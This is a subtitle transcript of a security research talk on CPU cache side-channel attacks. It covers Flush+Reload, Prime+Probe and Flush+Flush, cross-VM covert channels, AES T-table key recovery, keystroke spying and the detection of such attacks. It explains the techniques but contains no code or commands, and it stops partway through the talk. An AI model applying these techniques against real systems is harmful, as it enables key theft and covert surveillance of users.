1
00:00:00,000 --> 00:00:13,245
<i>Music</i>

2
00:00:13,245 --> 00:00:17,060
Herald Angel: We are here with a motto,
and the motto of this year is "Works For

3
00:00:17,060 --> 00:00:21,670
Me" and I think, who many people, how many
people in here are programmmers? Raise


4
00:00:21,670 --> 00:00:28,700
your hands or shout or... Whoa, that's a
lot. Okay. So I think many of you will

5
00:00:28,700 --> 00:00:38,990
work on x86. Yeah. And I think you assume
that it works, and that everything works

6
00:00:38,990 --> 00:00:48,150
as intended And I mean: What could go
wrong? Our next talk, the first one today,

7
00:00:48,150 --> 00:00:52,290
will be by Clémentine Maurice, who
previously was here with RowhammerJS,

8
00:00:52,290 --> 00:01:01,740
something I would call scary, and Moritz
Lipp, who has worked on the Armageddon

9
00:01:01,740 --> 00:01:09,820
exploit, back, what is it? Okay, so the
next... I would like to hear a really warm


10
00:01:09,820 --> 00:01:14,460
applause for the speakers for the talk
"What could what could possibly go wrong

11
00:01:14,460 --> 00:01:17,280
with insert x86 instruction here?"

12
00:01:17,280 --> 00:01:18,375
thank you.

13
00:01:18,375 --> 00:01:28,290
<i>Applause</i>

14
00:01:28,290 --> 00:01:32,530
Clémentine Maurice (CM): Well, thank you
all for being here this morning. Yes, this

15
00:01:32,530 --> 00:01:38,080
is our talk "What could possibly go wrong
with insert x86 instructions here". So

16
00:01:38,080 --> 00:01:42,850
just a few words about ourselves: So I'm
Clémentine Maurice, I got my PhD last year

17
00:01:42,850 --> 00:01:47,119
in computer science and I'm now working as
a postdoc at Graz University of Technology

18
00:01:47,119 --> 00:01:52,090
in Austria. You can reach me on Twitter or
by email but there's also I think a lots

19
00:01:52,090 --> 00:01:56,670
of time before the Congress is over.
Moritz Lipp (ML): Hi and my name is Moritz

20
00:01:56,670 --> 00:02:01,520
Lipp, I'm a PhD student at Graz University
of Technology and you can also reach me on

21
00:02:01,520 --> 00:02:06,679
Twitter or just after our talk and in the
next days.

22
00:02:06,679 --> 00:02:10,860
CM: So, about this talk: So, the title
says this is a talk about x86

23
00:02:10,860 --> 00:02:17,720
instructions, but this is not a talk about
software. Don't leave yet! I'm actually

24
00:02:17,720 --> 00:02:22,440
even assuming safe software and the point
that we want to make is that safe software

25
00:02:22,440 --> 00:02:27,390
does not mean safe execution and we have
information leakage because of the

26
00:02:27,390 --> 00:02:32,560
underlying hardware and this is what we're
going to talk about today. So we'll be

27
00:02:32,560 --> 00:02:36,819
talking about cache attacks, what are
they, what can we do with that and also a

28
00:02:36,819 --> 00:02:41,510
special kind of cache attack that we found
this year. So... doing cache attacks

29
00:02:41,510 --> 00:02:48,590
without memory accesses and how to use
that even to bypass kernel ASLR.

30
00:02:48,590 --> 00:02:53,129
So again, the talk says is to talk about
x86 instructions but this is even more

31
00:02:53,129 --> 00:02:58,209
global than that. We can also mount these
cache attacks on ARM and not only on the

32
00:02:58,209 --> 00:03:07,050
x86. So some of the examples that you will
see also applies to ARM. So today we'll do

33
00:03:07,050 --> 00:03:11,420
have a bit of background, but actually
most of the background will be along the

34
00:03:11,420 --> 00:03:19,251
lines because this covers really a huge
chunk of our research, and we'll see

35
00:03:19,251 --> 00:03:24,209
mainly three instructions: So "mov" and
how we can perform these cache attacks,

36
00:03:24,209 --> 00:03:29,430
what are they... The instruction
"clflush", so here we'll be doing cache

37
00:03:29,430 --> 00:03:36,370
attacks without any memory accesses. Then
we'll see "prefetch" and how we can bypass

38
00:03:36,370 --> 00:03:43,420
kernel ASLR and lots of translations
levels, and then there's even a bonus

39
00:03:43,420 --> 00:03:48,950
track, so it's this this will be not our
works, but even more instructions and even

40
00:03:48,950 --> 00:03:54,210
more text.
Okay, so let's start with a bit of an

41
00:03:54,210 --> 00:04:01,190
introduction. So we will be mainly
focusing on Intel CPUs, and this is

42
00:04:01,190 --> 00:04:05,599
roughly in terms of cores and caches, how
it looks like today. So we have different

43
00:04:05,599 --> 00:04:09,440
levels of cores ...uh... different cores
so here four cores, and different levels

44
00:04:09,440 --> 00:04:14,220
of caches. So here usually we have three
levels of caches. We have level 1 and

45
00:04:14,220 --> 00:04:18,269
level 2 that are private to each call,
which means that core 0 can only access

46
00:04:18,269 --> 00:04:24,520
its level 1 and its level 2 and not level
1 and level 2 of, for example, core 3, and

47
00:04:24,520 --> 00:04:30,130
we have the last level cache... so here if
you can see the pointer... So this one is

48
00:04:30,130 --> 00:04:36,289
divided in slices so we have as many
slices as cores, so here 4 slices, but all

49
00:04:36,289 --> 00:04:40,659
the slices are shared across core so core
0 can access the whole last level cache,

50
00:04:40,659 --> 00:04:48,669
that's 0 1 2 & 3. We also have a nice
property on Intel CPUs is that this level

51
00:04:48,669 --> 00:04:52,280
of cache is inclusive, and what it means
is that everything that is contained in

52
00:04:52,280 --> 00:04:56,889
level 1 and level 2 will also be contained
in the last level cache, and this will

53
00:04:56,889 --> 00:05:01,439
prove to be quite useful for cache
attacks.

54
00:05:01,439 --> 00:05:08,430
So today we mostly have set associative
caches. What it means is that we have data

55
00:05:08,430 --> 00:05:13,249
that is loaded in specific sets and that
depends only on its address. So we have

56
00:05:13,249 --> 00:05:18,900
some bits of the address that gives us the
index and that says "Ok the line is going

57
00:05:18,900 --> 00:05:24,610
to be loaded in this cache set", so this
is a cache set. Then we have several ways

58
00:05:24,610 --> 00:05:30,629
per set so here we have 4 ways and the
cacheine is going to be loaded in a

59
00:05:30,629 --> 00:05:35,270
specific way and that will only depend on
the replacement policy and not on the

60
00:05:35,270 --> 00:05:40,800
address itself, so when you load a line
into the cache, usually the cache is

61
00:05:40,800 --> 00:05:44,830
already full and you have to make room for
a new line. So this is where the

62
00:05:44,830 --> 00:05:49,729
replacement replacement policy—this is
what it does—it says ok I'm going to

63
00:05:49,729 --> 00:05:57,779
remove this line to make room for the next
line. So for today we're going to see only

64
00:05:57,779 --> 00:06:01,960
three instruction as I've been telling
you. So the move instruction, it does a

65
00:06:01,960 --> 00:06:06,610
lot of things but the only aspect that
we're interested in about it that can

66
00:06:06,610 --> 00:06:12,809
access data in the main memory.
We're going to see a clflush what it does

67
00:06:12,809 --> 00:06:18,349
is that it removes a cache line from the
cache, from the whole cache. And we're

68
00:06:18,349 --> 00:06:25,569
going to see prefetch, it prefetches a
cache line for future use. So we're going

69
00:06:25,569 --> 00:06:30,520
to see what they do and the kind of side
effects that they have and all the attacks

70
00:06:30,520 --> 00:06:34,800
that we can do with them. And that's
basically all the example you need for

71
00:06:34,800 --> 00:06:39,830
today so even if you're not an expert of
x86 don't worry it's not just slides full

72
00:06:39,830 --> 00:06:44,899
of assembly and stuff. Okay so on to the
first one.

73
00:06:44,899 --> 00:06:49,940
ML: So we will first start with the 'mov'
instruction and actually the first slide

74
00:06:49,940 --> 00:06:57,809
is full of code, however as you can see
the mov instruction is used to move data

75
00:06:57,809 --> 00:07:02,629
from registers to registers, from the main
memory and back to the main memory and as

76
00:07:02,629 --> 00:07:07,240
you can see there are many moves you can
use but basically it's just to move data

77
00:07:07,240 --> 00:07:12,589
and that's all we need to know. In
addition, a lot of exceptions can occur so

78
00:07:12,589 --> 00:07:18,139
we can assume that those restrictions are
so tight that nothing can go wrong when

79
00:07:18,139 --> 00:07:22,210
you just move data because moving data is
simple.

80
00:07:22,210 --> 00:07:27,879
However while there are a lot of
exceptions the data that is accessed is

81
00:07:27,879 --> 00:07:35,009
always loaded into the cache, so data is
in the cache and this is transparent to

82
00:07:35,009 --> 00:07:40,870
the program that is running. However,
there are side-effects when you run these

83
00:07:40,870 --> 00:07:46,219
instructions, and we will see how they
look like with the mov instruction. So you

84
00:07:46,219 --> 00:07:51,289
probably all know that data can either be
in CPU registers, in the different levels

85
00:07:51,289 --> 00:07:56,029
of the cache that Clementine showed to you
earlier, in the main memory, or on the

86
00:07:56,029 --> 00:08:02,219
disk, and depending on where the memory
and the data is located it needs a longer

87
00:08:02,219 --> 00:08:09,689
time to be loaded back to the CPU, and
this is what we can see in this plot. So

88
00:08:09,689 --> 00:08:15,739
we try here to measure the access time of
an address over and over again, assuming

89
00:08:15,739 --> 00:08:21,759
that when we access it more often, it is
already stored in the cache. So around 70

90
00:08:21,759 --> 00:08:27,289
cycles, most of the time we can assume
when we load an address and it takes 70

91
00:08:27,289 --> 00:08:34,809
cycles, it's loaded into the cache.
However, when we assume that the data is

92
00:08:34,809 --> 00:08:39,659
loaded from the main memory, we can
clearly see that it needs a much longer

93
00:08:39,659 --> 00:08:46,720
time like a bit more than 200 cycles. So
depending when we measure the time it

94
00:08:46,720 --> 00:08:51,470
takes to load the address we can say the
data has been loaded to the cache or the

95
00:08:51,470 --> 00:08:58,339
data is still located in the main memory.
And this property is what we can exploit

96
00:08:58,339 --> 00:09:05,339
using cache attacks. So we measure the
timing differences on memory accesses. And

97
00:09:05,339 --> 00:09:09,940
what an attacker does he monitors the
cache lines, but he has no way to know

98
00:09:09,940 --> 00:09:14,459
what's actually the content of the cache
line. So we can only monitor that this

99
00:09:14,459 --> 00:09:20,099
cache line has been accessed and not
what's actually stored in the cache line.

100
00:09:20,099 --> 00:09:24,411
And what you can do with this is you can
implement covert channels, so you can

101
00:09:24,411 --> 00:09:29,580
allow two processes to communicate with
each other evading the permission system

102
00:09:29,580 --> 00:09:35,060
what we will see later on. In addition you
can also do side channel attacks, so you

103
00:09:35,060 --> 00:09:40,600
can spy with a malicious attacking
application on benign processes, and you

104
00:09:40,600 --> 00:09:46,140
can use this to steal cryptographic keys
or to spy on keystrokes.

105
00:09:46,140 --> 00:09:53,649
And basically we have different types of
cache attacks and I want to explain the

106
00:09:53,649 --> 00:09:58,810
most popular one, the "Flush+Reload"
attack, in the beginning. So on the left,

107
00:09:58,810 --> 00:10:03,110
you have the address space of the victim,
and on the right you have the address

108
00:10:03,110 --> 00:10:08,560
space of the attacker who maps a shared
library—an executable—that the victim is

109
00:10:08,560 --> 00:10:14,899
using in to its own address space, like
the red rectangle. And this means that

110
00:10:14,899 --> 00:10:22,760
when this data is stored in the cache,
it's cached for both processes. Now the

111
00:10:22,760 --> 00:10:28,170
attacker can use the flush instruction to
remove the data out of the cache, so it's

112
00:10:28,170 --> 00:10:34,420
not in the cache anymore, so it's also not
cached for the victim. Now the attacker

113
00:10:34,420 --> 00:10:39,100
can schedule the victim and if the victim
decides "yeah, I need this data", it will

114
00:10:39,100 --> 00:10:44,970
be loaded back into the cache. And now the
attacker can reload the data, measure the

115
00:10:44,970 --> 00:10:49,661
time how long it took, and then decide
"okay, the victim has accessed the data in

116
00:10:49,661 --> 00:10:54,179
the meantime" or "the victim has not
accessed the data in the meantime." And by

117
00:10:54,179 --> 00:10:58,959
that you can spy if this address has been
used.

118
00:10:58,959 --> 00:11:03,240
The second type of attack is called
"Prime+Probe" and it does not rely on the

119
00:11:03,240 --> 00:11:08,971
shared memory like the "Flush+Reload"
attack, and it works as following: Instead

120
00:11:08,971 --> 00:11:16,139
of mapping anything into its own address
space, the attacker loads a lot of data

121
00:11:16,139 --> 00:11:24,589
into one cache line, here, and fills the
cache. Now he again schedules the victim

122
00:11:24,589 --> 00:11:31,820
and the schedule can access data that maps
to the same cache set.

123
00:11:31,820 --> 00:11:38,050
So the cache set is used by the attacker
and the victim at the same time. Now the

124
00:11:38,050 --> 00:11:43,050
attacker can start measuring the access
time to the addresses he loaded into the

125
00:11:43,050 --> 00:11:49,050
cache before, and when he accesses an
address that is still in the cache it's

126
00:11:49,050 --> 00:11:55,649
faster so he measures the lower time. And
if it's not in the cache anymore it has to

127
00:11:55,649 --> 00:12:01,279
be reloaded into the cache so it takes a
longer time. He can sum this up and detect

128
00:12:01,279 --> 00:12:07,870
if the victim has loaded data into the
cache as well. So the first thing we want

129
00:12:07,870 --> 00:12:11,900
to show you is what you can do with cache
attacks is you can implement a covert

130
00:12:11,900 --> 00:12:17,439
channel and this could be happening in the
following scenario.

131
00:12:17,439 --> 00:12:23,610
You install an app on your phone to view
your favorite images you take, to apply

132
00:12:23,610 --> 00:12:28,630
some filters, and in the end you don't
know that it's malicious because the only

133
00:12:28,630 --> 00:12:33,609
permission it requires is to access your
images which makes sense. So you can

134
00:12:33,609 --> 00:12:38,700
easily install it without any fear. In
addition you want to know what the weather

135
00:12:38,700 --> 00:12:43,040
is outside, so you install a nice little
weather widget, and the only permission it

136
00:12:43,040 --> 00:12:48,230
has is to access the internet because it
has to load the information from

137
00:12:48,230 --> 00:12:55,569
somewhere. So what happens if you're able
to implement a covert channel between two

138
00:12:55,569 --> 00:12:59,779
these two applications, without any
permissions and privileges so they can

139
00:12:59,779 --> 00:13:05,060
communicate with each other without using
any mechanisms provided by the operating

140
00:13:05,060 --> 00:13:11,149
system, so it's hidden. It can happen that
now the gallery app can send the image to

141
00:13:11,149 --> 00:13:18,680
the internet, it will be uploaded and
exposed for everyone. So maybe you don't

142
00:13:18,680 --> 00:13:25,610
want to see the cat picture everywhere.
While we can do this with those

143
00:13:25,610 --> 00:13:30,219
Prime+Probe/ Flush+Reload attacks, we will
discuss a covert channel using

144
00:13:30,219 --> 00:13:35,690
Prime+Probe. So how can we transmit this
data? We need to transmit ones and zeros

145
00:13:35,690 --> 00:13:40,980
at some point. So the sender and the
receiver agree on one cache set that they

146
00:13:40,980 --> 00:13:49,319
both use. The receiver probes the set all
the time. When the sender wants to

147
00:13:49,319 --> 00:13:57,529
transmit a zero he just does nothing, so
the lines of the receiver are in the cache

148
00:13:57,529 --> 00:14:01,809
all the time, and he knows "okay, he's
sending nothing", so it's a zero.

149
00:14:01,809 --> 00:14:05,940
On the other hand if the sender wants to
transmit a one, he starts accessing

150
00:14:05,940 --> 00:14:10,800
addresses that map to the same cache set
so it will take a longer time for the

151
00:14:10,800 --> 00:14:16,540
receiver to access its addresses again,
and he knows "okay, the sender just sent

152
00:14:16,540 --> 00:14:23,059
me a one", and Clementine will show you
what you can do with this covert channel.

153
00:14:23,059 --> 00:14:25,180
CM: So the really nice thing about

154
00:14:25,180 --> 00:14:28,959
Prime+Probe is that it has really low
requirements. It doesn't need any kind of

155
00:14:28,959 --> 00:14:34,349
shared memory. For example if you have two
virtual machines you could have some

156
00:14:34,349 --> 00:14:38,700
shared memory via memory deduplication.
The thing is that this is highly insecure,

157
00:14:38,700 --> 00:14:43,969
so cloud providers like Amazon ec2, they
disable that. Now we can still use

158
00:14:43,969 --> 00:14:50,429
Prime+Probe because it doesn't need this
shared memory. Another problem with cache

159
00:14:50,429 --> 00:14:54,999
covert channels is that they are quite
noisy. So when you have other applications

160
00:14:54,999 --> 00:14:59,259
that are also running on the system, they
are all competing for the cache and they

161
00:14:59,259 --> 00:15:03,009
might, like, evict some cache lines,
especially if it's an application that is

162
00:15:03,009 --> 00:15:08,749
very memory intensive. And you also have
noise due to the fact that the sender and

163
00:15:08,749 --> 00:15:12,770
the receiver might not be scheduled at the
same time. So if you have your sender that

164
00:15:12,770 --> 00:15:16,649
sends all the things and the receiver is
not scheduled then some part of the

165
00:15:16,649 --> 00:15:22,539
transmission can get lost. So what we did
is we tried to build an error-free covert

166
00:15:22,539 --> 00:15:30,829
channel. We took care of all these noise
issues by using some error detection to

167
00:15:30,829 --> 00:15:36,470
resynchronize the sender and the receiver
and then we use some error correction to

168
00:15:36,470 --> 00:15:40,779
correct the remaining errors.
So we managed to have a completely error-

169
00:15:40,779 --> 00:15:46,069
free covert channel even if you have a lot
of noise, so let's say another virtual

170
00:15:46,069 --> 00:15:54,119
machine also on the machine serving files
through a web server, also doing lots of

171
00:15:54,119 --> 00:16:01,600
memory-intensive tasks at the same time,
and the covert channel stayed completely

172
00:16:01,600 --> 00:16:07,610
error-free, and around 40 to 75 kilobytes
per second, which is still quite a lot.

173
00:16:07,610 --> 00:16:14,470
All of this is between virtual machines on
Amazon ec2. And the really neat thing—we

174
00:16:14,470 --> 00:16:19,389
wanted to do something with that—and
basically we managed to create an SSH

175
00:16:19,389 --> 00:16:27,060
connection really over the cache. So they
don't have any network between

176
00:16:27,060 --> 00:16:31,439
them, but just we are sending the zeros
and the ones and we have an SSH connection

177
00:16:31,439 --> 00:16:36,839
between them. So you could say that cache
covert channels are nothing, but I think

178
00:16:36,839 --> 00:16:43,079
it's a real threat. And if you want to
have more details about this work in

179
00:16:43,079 --> 00:16:49,220
particular, it will be published soon at
NDSS.

180
00:16:49,220 --> 00:16:54,040
So the second application that we wanted
to show you is that we can attack crypto

181
00:16:54,040 --> 00:17:01,340
with cache attacks. In particular we are
going to show an attack on AES and a

182
00:17:01,340 --> 00:17:04,990
special implementation of AES that uses
T-Tables. so that's the fast software

183
00:17:04,990 --> 00:17:11,650
implementation because it uses some
precomputed lookup tables. It's known to

184
00:17:11,650 --> 00:17:17,490
be vulnerable to side-channel attacks
since 2006 by Osvik et al, and it's a one-

185
00:17:17,490 --> 00:17:24,110
round known plaintext attack, so you have
p—or plaintext—and k, your secret key. And

186
00:17:24,110 --> 00:17:29,570
the AES algorithm, what it does is compute
an intermediate state at each round r.

187
00:17:29,570 --> 00:17:38,559
And in the first round, the accessed table
indices are just p XOR k. Now it's a known

188
00:17:38,559 --> 00:17:43,500
plaintext attack, what this means is that
if you can recover the accessed table

189
00:17:43,500 --> 00:17:49,460
indices you've also managed to recover the
key because it's just XOR. So that would

190
00:17:49,460 --> 00:17:55,450
be bad, right, if we could recover these
accessed table indices. Well we can, with

191
00:17:55,450 --> 00:18:00,510
cache attacks! So we did that with
Flush+Reload and with Prime+Probe. On the

192
00:18:00,510 --> 00:18:05,809
x-axis you have the plaintext byte values
and on the y-axis you have the addresses

193
00:18:05,809 --> 00:18:15,529
which are essentially the T table entries.
So a black cell means that we've monitored

194
00:18:15,529 --> 00:18:19,970
the cache line, and we've seen a lot of
cache hits. So basically the blacker it

195
00:18:19,970 --> 00:18:25,650
is, the more certain we are that the
T-Table entry has been accessed. And here

196
00:18:25,650 --> 00:18:31,779
it's a toy example, the key is all-zeros,
but you would basically just have a

197
00:18:31,779 --> 00:18:35,700
different pattern if the key was not all-
zeros, and as long as you can see this

198
00:18:35,700 --> 00:18:43,409
nice diagonal or a pattern then you have
recovered the key. So it's an old attack,

199
00:18:43,409 --> 00:18:48,890
2006, it's been 10 years, everything
should be fixed by now, and you see where

200
00:18:48,890 --> 00:18:56,880
I'm going: it's not. So on Android the
bouncy castle implementation it uses by

201
00:18:56,880 --> 00:19:03,360
default the T-table, so that's bad. Also
many implementations that you can find

202
00:19:03,360 --> 00:19:11,380
online uses pre-computed values, so maybe
be wary about this kind of attacks. The

203
00:19:11,380 --> 00:19:17,240
last application we wanted to show you is
how we can spy on keystrokes.

204
00:19:17,240 --> 00:19:21,480
So for that we will use flush and reload
because it's a really fine grained

205
00:19:21,480 --> 00:19:26,309
attack. We can see very precisely which
cache line has been accessed, and a cache

206
00:19:26,309 --> 00:19:31,440
line is only 64 bytes so it's really not a
lot and we're going to use that to spy on

207
00:19:31,440 --> 00:19:37,690
keystrokes and we even have a small demo
for you.

208
00:19:40,110 --> 00:19:45,640
ML: So what you can see on the screen this
is not on Intel x86 it's on a smartphone,

209
00:19:45,640 --> 00:19:50,330
on the Galaxy S6, but you can also apply
these cache attacks there so that's what

210
00:19:50,330 --> 00:19:53,850
we want to emphasize.
So on the left you see the screen and on

211
00:19:53,850 --> 00:19:57,960
the right we have connected a shell with
no privileges and permissions, so it can

212
00:19:57,960 --> 00:20:00,799
basically be an app that you install
<i>glass bottle falling</i>

213
00:20:00,799 --> 00:20:09,480
from the App Store and on the right we are
going to start our spy tool, and on the

214
00:20:09,480 --> 00:20:14,110
left we just open the messenger app and
whenever the user hits any key on the

215
00:20:14,110 --> 00:20:19,690
keyboard our spy tool takes care of that
and notices that. Also if he presses the

216
00:20:19,690 --> 00:20:26,120
spacebar we can also measure that. If the
user decides "ok, I want to delete the

217
00:20:26,120 --> 00:20:30,880
word" because he changed his mind, we can
also register if the user pressed the

218
00:20:30,880 --> 00:20:37,929
backspace button, so in the end we can see
exactly how long the words were, the user

219
00:20:37,929 --> 00:20:45,630
typed into his phone without any
permissions and privileges, which is bad.

220
00:20:45,630 --> 00:20:55,250
<i>laughs</i>
<i>applause</i>

221
00:20:55,250 --> 00:21:00,320
ML: so enough about the mov instruction,
let's head to clflush.

222
00:21:00,320 --> 00:21:07,230
CM: So the clflush instruction: What it
does is that it invalidates from every

223
00:21:07,230 --> 00:21:12,309
level the cache line that contains the
address that you pass to this instruction.

224
00:21:12,309 --> 00:21:16,990
So in itself it's kind of bad because it
enables the Flush+Reload attacks that we

225
00:21:16,990 --> 00:21:21,300
showed earlier, that was just flush,
reload, and the flush part is done with

226
00:21:21,300 --> 00:21:29,140
clflush. But there's actually more to it,
how wonderful. So there's a first timing

227
00:21:29,140 --> 00:21:33,320
leakage with it, so we're going to see
that the clflush instruction has a

228
00:21:33,320 --> 00:21:37,890
different timing depending on whether the
data that you that you pass to it is

229
00:21:37,890 --> 00:21:44,710
cached or not. So imagine you have a cache
line that is on the level 1 by inclu...

230
00:21:44,710 --> 00:21:50,299
With the inclusion property it has to be
also in the last level cache. Now this is

231
00:21:50,299 --> 00:21:54,350
quite convenient and this is also why we
have this inclusion property for

232
00:21:54,350 --> 00:22:00,019
performance reason on Intel CPUs, if you
want to see if a line is present at all in

233
00:22:00,019 --> 00:22:04,209
the cache you just have to look in the
last level cache. So this is basically

234
00:22:04,209 --> 00:22:08,010
what the clflush instruction does. It goes
to the last last level cache, sees "ok

235
00:22:08,010 --> 00:22:12,890
there's a line, I'm going to flush this
one" and then there's something that tells

236
00:22:12,890 --> 00:22:18,950
ok the line is also present somewhere else
so then it flushes the line in level 1

237
00:22:18,950 --> 00:22:26,390
and/or level 2. So that's slow. Now if you
perform clflush on some data that is not

238
00:22:26,390 --> 00:22:32,240
cached, basically it does the same, goes
to the last level cache, see that there's

239
00:22:32,240 --> 00:22:36,659
no line and there can't be any... This
data can't be anywhere else in the cache

240
00:22:36,659 --> 00:22:41,269
because it would be in the last level
cache if it was anywhere, so it does

241
00:22:41,269 --> 00:22:47,430
nothing and it stop there. So that's fast.
So how exactly fast and slow am I talking

242
00:22:47,430 --> 00:22:53,760
about? So it's actually only a very few
cycles so we did this experiments on

243
00:22:53,760 --> 00:22:59,072
different microarchitecture so Center
Bridge, Ivy Bridge, and Haswell and...

244
00:22:59,072 --> 00:23:03,250
So it different colors correspond to the
different microarchitecture. So first

245
00:23:03,250 --> 00:23:07,880
thing that is already... kinda funny is
that you can see that you can distinguish

246
00:23:07,880 --> 00:23:14,649
the micro architecture quite nicely with
this, but the real point is that you have

247
00:23:14,649 --> 00:23:20,280
really a different zones. The solids...
The solid line is when we performed the

248
00:23:20,280 --> 00:23:25,200
measurement on clflush with the line that
was already in the cache, and the dashed

249
00:23:25,200 --> 00:23:30,840
line is when the line was not in the
cache, and in all microarchitectures you

250
00:23:30,840 --> 00:23:36,539
can see that we can see a difference: It's
only a few cycles, it's a bit noisy, so

251
00:23:36,539 --> 00:23:43,250
what could go wrong? Okay, so exploiting
these few cycles, we still managed to

252
00:23:43,250 --> 00:23:47,029
perform a new cache attacks that we call
"Flush+Flush", so I'm going to explain

253
00:23:47,029 --> 00:23:52,220
that to you: So basically everything that
we could do with "Flush+Reload", we can

254
00:23:52,220 --> 00:23:56,899
also do with "Flush+Flush". We can perform
cover channels and sidechannel attacks.

255
00:23:56,899 --> 00:24:01,090
It's stealthier than previous cache
attacks, I'm going to go back on this one,

256
00:24:01,090 --> 00:24:07,220
and it's also faster than previous cache
attacks. So how does it work exactly? So

257
00:24:07,220 --> 00:24:12,210
the principle is a bit similar to
"Flush+Reload": So we have the attacker

258
00:24:12,210 --> 00:24:16,131
and the victim that have some kind of
shared memory, let's say a shared library.

259
00:24:16,131 --> 00:24:21,340
It will be shared in the cache The
attacker will start by flushing the cache

260
00:24:21,340 --> 00:24:26,510
line then let's the victim perform
whatever it does, let's say encryption,

261
00:24:26,510 --> 00:24:32,120
the victim will load some data into the
cache, automatically, and now the attacker

262
00:24:32,120 --> 00:24:36,720
wants to know again if the victim accessed
this precise cache line and instead of

263
00:24:36,720 --> 00:24:43,540
reloading it is going to flush it again.
And since we have this timing difference

264
00:24:43,540 --> 00:24:47,040
depending on whether the data is in the
cache or not, it gives us the same

265
00:24:47,040 --> 00:24:54,889
information as if we reloaded it, except
it's way faster. So I talked about

266
00:24:54,889 --> 00:24:59,690
stealthiness. So the thing is that
basically these cache attacks and that

267
00:24:59,690 --> 00:25:06,340
also applies to "Rowhammer": They are
already stealth in themselves, because

268
00:25:06,340 --> 00:25:10,470
there's no antivirus today that can detect
them. but some people thought that we

269
00:25:10,470 --> 00:25:14,351
could detect them with performance
counters because they do a lot of cache

270
00:25:14,351 --> 00:25:18,549
misses and cache references that happen
when the data is flushed and when you

271
00:25:18,549 --> 00:25:26,090
reaccess memory. now what we thought is
that yeah but that also not the only

272
00:25:26,090 --> 00:25:31,269
program steps to lots of cache misses and
cache references so we would like to have

273
00:25:31,269 --> 00:25:38,120
a slightly parametric. So these cache
attacks they have a very heavy activity on

274
00:25:38,120 --> 00:25:43,840
the cache but they're also very particular
because there are very short loops of code

275
00:25:43,840 --> 00:25:48,610
if you take flush and reload this just
flush one line reload the line and then

276
00:25:48,610 --> 00:25:53,750
again flush reload that's very short loop
and that creates a very low pressure on

277
00:25:53,750 --> 00:26:01,490
the instruction therapy which is kind of
particular for of cache attacks so what we

278
00:26:01,490 --> 00:26:05,380
decided to do is normalizing the cache
even so the cache misses and cache

279
00:26:05,380 --> 00:26:10,720
references by events that have to do with
the instruction TLB and there we could

280
00:26:10,720 --> 00:26:19,360
manage to detect cache attacks and
Rowhammer without having false positives

281
00:26:19,360 --> 00:26:24,510
so the system metric that I'm going to use
when I talk about stealthiness so we

282
00:26:24,510 --> 00:26:29,750
started by creating a cover channel. First
we wanted to have it as fast as possible

283
00:26:29,750 --> 00:26:36,160
so we created a protocol to evaluates all
the kind of cache attack that we had so

284
00:26:36,160 --> 00:26:40,540
flush+flush, flush+reload, and
prime+probe and we started with a

285
00:26:40,540 --> 00:26:47,010
packet side of 28 doesn't really matter.
We measured the capacity of our covert

286
00:26:47,010 --> 00:26:52,799
channel and flush+flush is around
500 kB/s whereas Flush+Reload

287
00:26:52,799 --> 00:26:56,340
was only 300 kB/s
so Flush+Flush is already quite an

288
00:26:56,340 --> 00:27:00,740
improvement on the speed.
Then we measured the stealth zone at this

289
00:27:00,740 --> 00:27:06,100
speed only Flush+Flush was stealth and
now the thing is that Flush+Flush and

290
00:27:06,100 --> 00:27:10,200
Flush+Reload as you've seen there are
some similarities so for a covert channel

291
00:27:10,200 --> 00:27:15,309
they also share the same center on it is
receivers different and for this one the

292
00:27:15,309 --> 00:27:20,000
center was not stealth for both of them
anyway if you want a fast covert channel

293
00:27:20,000 --> 00:27:26,640
then just try flush+flush that works.
Now let's try to make it stealthy

294
00:27:26,640 --> 00:27:30,639
completely stealthy because if I have the
standard that is not stealth maybe that we

295
00:27:30,639 --> 00:27:36,440
give away the whole attack so we said okay
maybe if we just slow down all the attacks

296
00:27:36,440 --> 00:27:41,240
then there will be less cache hits,
cache misses and then maybe all

297
00:27:41,240 --> 00:27:48,070
the attacks are actually stealthy why not?
So we tried that we slowed down everything

298
00:27:48,070 --> 00:27:52,889
so Flush+Reload and Flash+Flash
are around 50 kB/s now

299
00:27:52,889 --> 00:27:55,829
Prime+Probe is a bit slower because it
takes more time

300
00:27:55,829 --> 00:28:01,330
to prime and probe anything but still

301
00:28:01,330 --> 00:28:09,419
even with this slow down only Flush+Flush
has its receiver stealth and we also

302
00:28:09,419 --> 00:28:14,769
managed to have the sender stealth now so
basically whether you want a fast covert

303
00:28:14,769 --> 00:28:20,450
channel or a stealth covert channel
Flush+Flush is really great.

304
00:28:20,450 --> 00:28:26,500
Now we wanted to also evaluate if it
wasn't too noisy to perform some side

305
00:28:26,500 --> 00:28:30,740
channel attack so we did these side
channels on the AES t-table implementation

306
00:28:30,740 --> 00:28:35,910
the attacks that we have shown you
earlier, so we computed a lot of

307
00:28:35,910 --> 00:28:41,820
encryption that we needed to determine the
upper four bits of a key bytes so here the

308
00:28:41,820 --> 00:28:48,870
lower the better the attack and Flush +
Reload is a bit better so we need only 250

309
00:28:48,870 --> 00:28:55,029
encryptions to recover these bits but
Flush+Flush comes quite, comes quite

310
00:28:55,029 --> 00:29:00,570
close with 350 and Prime+Probe is
actually the most noisy of them all, needs

311
00:29:00,570 --> 00:29:06,101
5... close to 5000 encryptions so we have
around the same performance for

312
00:29:06,101 --> 00:29:13,520
Flush+Flush and Flush+Reload.
Now let's evaluate the stealthiness again.

313
00:29:13,520 --> 00:29:19,320
So what we did here is we perform 256
billion encryptions in a synchronous

314
00:29:19,320 --> 00:29:25,740
attack so we really had the spy and the
victim scattered and we evaluated the

315
00:29:25,740 --> 00:29:31,409
stealthiness of them all and here only
Flush+Flush again is stealth. And while

316
00:29:31,409 --> 00:29:36,279
you can always slow down a covert channel
you can't actually slow down a side

317
00:29:36,279 --> 00:29:40,700
channel because, in a real-life scenario,
you're not going to say "Hey victim, him

318
00:29:40,700 --> 00:29:47,179
wait for me a bit, I am trying to do an
attack here." That won't work.

319
00:29:47,179 --> 00:29:51,429
So there's even more to it but I will need
again a bit of background before

320
00:29:51,429 --> 00:29:56,910
continuing. So I've shown you the
different levels of caches and here I'm

321
00:29:56,910 --> 00:30:04,009
going to focus more on the last-level
cache. So we have here our four slices so

322
00:30:04,009 --> 00:30:09,830
this is the last-level cache and we have
some bits of the address here that

323
00:30:09,830 --> 00:30:14,330
corresponds to the set, but more
importantly, we need to know where in

324
00:30:14,330 --> 00:30:19,899
which slice and address is going to be.
And that is given, that is given by some

325
00:30:19,899 --> 00:30:23,850
bits of the set and the type of the
address that are passed into a function

326
00:30:23,850 --> 00:30:27,960
that says in which slice the line is going
to be.

327
